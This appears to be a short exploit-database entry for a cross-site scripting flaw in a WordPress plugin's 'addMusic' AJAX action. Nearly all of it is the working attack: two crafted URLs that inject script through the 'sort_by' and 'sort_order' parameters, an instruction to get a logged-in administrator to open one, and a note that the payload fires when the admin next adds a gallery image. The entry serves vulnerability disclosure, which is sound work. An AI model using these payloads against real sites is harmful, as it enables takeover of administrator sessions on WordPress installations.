## https://sploitus.com/exploit?id=WPEX-ID:89656CB3-4611-4AE7-B7F8-1B22EB75CFC4
Make a logged in admin open one of the below URL:
https://example.com/wp-admin/admin-ajax.php?action=addMusic&sort_by=%22;alert(/XSS/);%22
https://example.com/wp-admin/admin-ajax.php?action=addMusic&sort_by=size&sort_order=%22;alert(/XSS-order/);%22
Even though the request above will result in a "Sorry, your nonce did not verify." error, the XSS payload will trigger when an admin attempts to add a new image to a gallery.